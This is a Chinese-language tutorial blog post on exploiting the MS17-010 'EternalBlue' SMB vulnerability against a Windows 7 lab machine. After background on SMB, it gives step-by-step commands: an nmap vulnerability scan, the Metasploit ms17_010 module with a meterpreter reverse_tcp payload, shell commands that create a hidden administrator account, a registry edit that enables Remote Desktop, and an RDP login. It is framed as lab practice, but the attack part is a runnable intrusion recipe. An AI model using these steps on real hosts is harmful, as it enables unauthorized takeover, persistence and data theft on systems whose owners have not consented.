MS17-010---利用“永恒之蓝”漏洞攻击 win7主机

news2024/12/24 8:17:08

免责声明:本文仅做技术交流与学习....

目录

一.前置知识

1.何为永恒之蓝?

2.什么是SMB协议?

3.SMB工作原理是什么?

二、实验环境

三、实验步骤

nmap扫描

msf一把梭哈

shell执行命令

远程连接

一.

二.


一.前置知识

1.何为永恒之蓝?

        永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.什么是SMB协议?

        SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

3.SMB工作原理是什么?

     (1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。

     (2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。

      (3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。

      (4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。


二、实验环境

攻击机器:Kali

依赖工具:MSF、nmap

靶机:win7


三、实验步骤

Win7永恒之蓝漏洞步骤

nmap扫描

打开win7,发现密码都不知道。(然后用nmap扫描,看靶机是否存在漏洞,存在可利用漏洞进行操作。)

打开kali,进入终端,输入sudo su root进入管理员。

Ifconfig        -->进行查询kali的ip地址。

nmap 网段à进行网段扫描,得到靶机的ip地址。

nmap –script=vuln 靶机的ip地址à得出靶机是否存在漏洞.

由此看到存在编号为:ms17_010的漏洞,所以接下来进行漏洞利用。

msf一把梭哈

msfconsole--->指令进入控制台。

search ms17_010         -->搜索漏洞编号。

use 0        -->进行爆破。

show options        --->查看配置。

set RHOSTS 靶机ip地址        -->配置靶机的ip地址。

set payload windows/x64/meterpreter/reverse_tcp        -->配置要攻击的系统。

exploit        --->进行爆破。

-->显示meterpreter说明成功进入靶机。

shell执行命令

shell        --->成功进入服务端。

net user 账号 密码 /add        -->进行设置新用户的账号密码。

net localgroup administrators 账号 /add               --->将建立的新账号列入管理员权限。

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d   00000000 /f        -->输入此命令打开远程权限。

远程连接

至此

有两种方法,选择一种即可。

一.

自己电脑的搜索栏里搜索:远程桌面连接。

输入靶机的ip地址。(检查一下用户名是你刚刚自己新创建的。)

点击:连接。

输入刚刚创建的密码即可。

 

二.

再打开一个新新的终端àrdesktop 靶机ip地址        -->进行远程桌面。

远程桌面开启后,选择其它用户登录,输入刚才新创建的账号密码登录即可。


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1633410.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C++常用的输入输出方法(ACM模式)

文章目录 前言一、输入输出方法1、cin2、getline()3、getchar() 二、算法案例1、一维数组1.1 输入固定长度1.2长度不固定 2、固定二维数组3、以非空格隔开的元素输入3、常见数据结构定义以及输入3.1 链表 前言 C中的输入输出函数有很多,我们本章只针对大部分算法题…

vue +antvX6 根据节点与线,动态设置节点坐标生成流程图

需求 vue2 antvX6完成流程图,但只有节点与线,没有节点的坐标,需要根据节点的顺序显示流程图。 需求: 1.根据数据动态生成对应的节点与线; 2.节点不能重叠; 3.节点与线可拖拽; 4.因为线存在重…

渗透之sql注入联合查询的注入

sql注入产生的原因: 由于程序过滤不严谨,导致用户有一些异常输入,最终触发数据库的查询。所以会出现sql注入这个问题。有些恶意的人就会利用这些信息导致数据库泄露。 注意:一般我们存在注入点我们会查询管理员的账号和密码&#…

【C 数据结构】深度优先搜索、广度优先搜索

文章目录 【 1. DFS 深度优先搜索 】1.1 基本原理1.2 C 实现 【 2. BFS 广度优先搜索 】2.1 基本原理2.2 C 实现 【 3. 深度优先生成树、广度优先生成树 】【 4. 深度优先生成森林、广度优先生成森林 】4.1 深度优先生成森林4.2 广度优先生成森林 对存储的图中的顶点进行遍历搜…

P6技巧-关于汇总项目Summarize的使用

前言 不知你在使用P6项目时是否察觉到这么一个有趣的现象,在打开一个项目(展开详细任务)时,在项目页签下可以看到该项目能反馈此时项目的总体进展及完成时间等内容,而当项目关闭时,其前面所展示的进展信息…

2.1.5 EtherChannel 简介

1、EtherChannel 简介 EtherChannel (以太网通道)是由 Cisco 公司开发的、应用于交换机之间的多链路捆绑技术。它的基本原理是将两台设备间多条以太网链路捆绑在一起组成一条逻辑链路,形成一个端口通道(PortChannel)&a…

selenium 4.x入门篇(环境搭建、八大元素定位)

背景 Web自动化测现状 1. 属于 E2E 测试 2. 过去通过点点点 3. 好的测试,还需要记录、调试网页的细节 一、selenium4.x环境搭建 一键搭建 pip3 install webdriver-helper 安装后自动的完成: 1. 查看浏览器的版本号 2. 查询操作系统的类型…

生活服务推出品牌实惠团购,覆盖五一假期“吃喝玩乐”多场景

4月26日,抖音生活服务平台上线“跟着大牌过五一”活动会场,携手22家连锁品牌商家,于“五一”前推出优价团购和时令新品,覆盖“吃喝玩乐”多重购物需求,助力假期消费。同时,伴随各地涌现的文旅热潮&#xff…

VUE的生命周期图和各函数

函数 beforeCreate(){ }, created(){ }, beforeMount(){ }, mounted(){ }, beforeUpdate(){ }, updated(){ }, beforeDestroy(){ }, destroyed(){ } 创建时生命周期图 运行时生命周期图

Linux vi\vim编辑器

vi/vim编辑器 一、vi\vim 编辑器的三种工作模式1.命令模式(Command mode)2.输入模式(Insert mode)3.底线命令模式(Last line mode) 二、参考 vi\vim 是 visual interface 的简称,是 Linux 中最经…

docker 虚拟化与docker的概念

一、云计算的三种服务模式 laas、pass、saas 1.1 IaaS: Infrastructure-as-a-Service(基础设施即服务) 第一层叫做IaaS,有时候也叫做Hardware-as-a-Service,几年前如果你想在办公室或者公司的网站上运行一些企业应用&#xff0c…

Linux网络-文件传输协议之FTP服务(附带命令及截图)

目录 一.FTP简介 二.FTP的数据模式 1.主动模式 2.被动模式 3.两种模式比较 三.安装配置vsftpd 1.安装vsftpd 1.1.安装前关闭防火墙 1.2.安装vsftpd 1.3.查看 1.4.备份 2.配置 3.重启后生效 四.相关实验 1.以win为例 1.1.设置并测试测试连通性 1.2.在终端里创建…

【人工智能基础】聚类实验分析

实验环境:anaconda、jupyter notebook、spyder 实现用到的类库:numpy、matplotlib、scikit-learn k均值聚类(K-MEANS) k均值聚类的原理: 选定k个聚类中心把数据集中距离聚类中心i最近的点都归属到一个簇根据每个簇中…

【Linux开发 第十二篇】搭建JavaEE环境

搭建开发环境 搭建javaEE环境 搭建javaEE环境 在Linux下开发JavaEE需要安装软件包: 安装jdk 安装步骤: 在opt目录下创建jdk目录通过xftp上床到jdk目录中进入到jdk目录中,解压jdk压缩包在/usr/local下创建java目录将解压完成的jdk文件移动…

Docker的介绍及应用

1.什么是Docker 我们在部署大型项目的时候,肯定会遇到这种问题,大学项目组件较多,运行环境复杂,部署时会碰到一些问题:例如node、redis、mysql等这些应用都有自己的依赖和函数库。这种复杂的依赖关系很容易出现兼容问…

笔试刷题-Day11

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 一、游游的水果大礼包 题目链接:https://ac.nowcoder.com/acm/problem/255193 类型:求一个表达式的最值(并不是贪心,因为该题条件太少&…

毕业设计注意事项(嘉庚学院2024届更新中)

1.开题 根据学院发的开题报告模板完成,其中大纲部分可参考资料。 2.毕设以及实习 2.1 毕设 根据资料中的毕设评价标准,对照工作量 2.2 实习材料提交 2.2.1 校外实习 实习前:根据学院要求,填写好实习承诺书,实习单位…

贝叶斯统计实战:Python引领的现代数据分析之旅

贝叶斯统计这个名字取自长老会牧师兼业余数学家托马斯贝叶斯(Thomas Bayes,1702—1761),他最先推导出了贝叶斯定理,该定理于其逝世后的1763年发表。但真正开发贝叶斯方法的第一人是Pierre-Simon Laplace(1749—1827),因此将其称为…

清华同方电脑c盘满了怎么清理?别慌,学会这几个实用技巧

随着日常使用电脑,C盘(通常是系统盘)往往会积累大量的文件、程序和系统缓存,导致磁盘空间逐渐减少。当C盘空间不足时,电脑的性能可能会受到影响,甚至导致一些程序无法正常运行。对于清华同方电脑的用户来说…

2000.1-2023.8中国经济政策不确定性指数数据(日度、月度)

2000.1-2023.8中国经济政策不确定性指数数据(日度、月度) 1、时间:日度:2001.1.1-2022.06.17,月度2000.1-2023.8 2、指标:CNEPU(经济政策不确定性指数) 3、来源:China…